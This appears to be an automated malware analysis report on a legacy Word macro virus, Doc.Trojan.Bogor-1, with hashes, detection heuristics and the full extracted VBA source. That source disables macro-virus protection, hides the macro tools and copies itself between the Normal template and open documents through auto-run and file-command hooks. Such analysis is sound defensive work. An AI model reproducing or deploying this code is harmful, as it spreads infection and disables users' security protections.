Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49a27201802366d4…

MALICIOUS

Office (OLE)

Size: 39.5 KB | Created: 1999-09-10 02:21:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: cfc90fb73d4f005a2826cf3b10cb1504
SHA-1: defbed371cf6122bcae908ce685b7b860ac9e76e
SHA-256: 49a27201802366d453a8c8dbc077618eb01842f23093f86d90fb972a41cf754f
Risk Score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon document opening. ClamAV detections confirm this as a known malware variant, 'Doc.Trojan.Bogor-1'. The VBA script attempts to disable macro security features and manipulate command bars, suggesting an intent to conceal its malicious activity and potentially download or execute further payloads.

Heuristics 5

  • ClamAV: Doc.Trojan.Bogor-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bogor-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Application.OrganizerCopy Source:=Ad.FullName, _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7691 bytes
SHA-256: 04c05615ca5567bab16097386afce8e1f061bbd4a575fb89e532eec8923f618b
Detection
ClamAV: Doc.Trojan.Bogor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IPBBogor"
Public AlAsal
Public DokSave
Public Norok
Public Dokok
Sub CyInit()
Attribute CyInit.VB_Description = "Bogor Agriculture University"
Attribute CyInit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyInit"
    AlAsal = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Tahan

    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub CyClose()
Attribute CyClose.VB_Description = "Bogor Agriculture University"
Attribute CyClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyClose"
Application.DisplayAlerts = AlAsal
End Sub
Sub Dok2Nor()
Attribute Dok2Nor.VB_Description = "Bogor Agriculture University"
Attribute Dok2Nor.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Dok2Nor"
    Call Tahan
    On Error GoTo Erw1
    Norok = False
    Set Ad = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Norok = True
      If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Erh1a:
    If Norok = False Then
      On Error GoTo Erh1
      Application.OrganizerCopy Source:=Ad.FullName, _
          Destination:=NT.FullName, Name:= _
          "IPBBogor", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Erh1:
    End If
Erw1:
End Sub
Sub Nor2Dok()
Attribute Nor2Dok.VB_Description = "Bogor Agriculture University"
Attribute Nor2Dok.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Nor2Dok"
    On Error GoTo Erw2
    DokSave = 0
    Dokok = False
    Set Ad = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh2a
    For i = 1 To Ad.VBProject.VBComponents.Count
      NMacr = Ad.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Dokok = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Dokok = True
      If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=Ad.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Erh2a:
    If Dokok = False Then
      On Error GoTo Erh2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=Ad.FullName, Name:= _
          "IPBBogor", Object:=wdOrganizerObjectProjectItems
      DokSave = 1
Erh2:
    End If
Erw2:
End Sub
Sub Cyber()
Attribute Cyber.VB_Description = "Bogor Agriculture University"
Attribute Cyber.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Cyber"
    Call CyInit
    Call Dok2Nor
    Call CyClose
End Sub
Sub Tahan()
Attribute Tahan.VB_Description = "Bogor Agriculture University"
Attribute Tahan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Tahan"
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = True
    End With
End Sub
Sub Simpan()
Attribute Simpan.VB_Description = "Bogor Agriculture University"
Attribute Simpan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Simpan"
    On Error GoTo Erh4
Set Ad = ActiveDocument
    If DokSave = 1 Then
       Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument
    End If
Erh4:
End Sub
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Bogor Agriculture University"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.AutoOpen"
    Call Cyber
End Sub
Sub FileClose()
Attribute FileClose.VB_Description = "Bogor Agriculture University"
Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileClose"
    Call CyInit
    Call Dok2Nor
    Call Nor2Dok
    Call CyClose
    WordBasic.FileClose
End Sub
Sub FileOpen()
Attribute FileOpen.VB_Description = "Bogor Agriculture University"
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileOpen"
    Call Cyber
    Dialogs(wdDialogFileOpen).Show
    Call CyInit
    Call Nor2Dok
    Call Simpan
    Call CyClose
End Sub
Sub FileSaveAs()
Attribute FileSaveAs.VB_Description = "Bogor Agriculture University"
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSaveAs"
    Call CyInit
    Call Dok2Nor
    Call Nor2Dok
    Call CyClose
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileSave()
Attribute FileSave.VB_Description = "Bogor Agriculture University"
Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSave"
    Call CyInit
    Call Dok2Nor
    Call Nor2Dok
    Call CyClose
    On Error GoTo Errh1
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Errh1:
End Sub
Sub HelpAbout()
Attribute HelpAbout.VB_Description = "Bogor Agriculture University"
Attribute HelpAbout.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.HelpAbout"
    On Error GoTo Erw3
    MsgBox "Reformasi, YES!", 48
    Help wdHelpAbout
Erw3:
End Sub
Sub FileExit()
Attribute FileExit.VB_Description = "Bogor Agriculture University"
Attribute FileExit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileExit"
    Call CyInit
    Call Dok2Nor
    Call Nor2Dok
    On Error GoTo Erw4
Erw4:
    Call CyClose
    WordBasic.FileExit
End Sub
Sub ToolsOptions()
Attribute ToolsOptions.VB_Description = "Bogor Agriculture University"
Attribute ToolsOptions.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsOptions"
    Dialogs(wdDialogToolsOptions).Show
    Call Cyber
End Sub
Sub FileNew()
Attribute FileNew.VB_Description = "Bogor Agriculture University"
Attribute FileNew.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileNew"
    Call Cyber
    Dialogs(wdDialogFileNew).Show
End Sub
Sub FileTemplates()
Attribute FileTemplates.VB_Description = "Bogor Agriculture University"
Attribute FileTemplates.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileTemplates"
    Call Cyber
End Sub
Sub ToolsMacro()
Attribute ToolsMacro.VB_Description = "Bogor Agriculture University"
Attribute ToolsMacro.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsMacro"
    Call Cyber
End Sub
Sub ToolsCustomize()
Attribute ToolsCustomize.VB_Description = "Bogor Agriculture University"
Attribute ToolsCustomize.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomize"
    Call Cyber
End Sub
Sub ToolsCustomizeKeyboard()
Attribute ToolsCustomizeKeyboard.VB_Description = "Bogor Agriculture University"
Attribute ToolsCustomizeKeyboard.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomizeKeyboard"
    Call Cyber
End Sub
Sub ViewVBCode()
Attribute ViewVBCode.VB_Description = "Bogor Agriculture University"
Attribute ViewVBCode.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ViewVBCode"
    Call Cyber
End Sub
Sub Organizer()
Attribute Organizer.VB_Description = "Bogor Agriculture University"
Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Organizer"
End Sub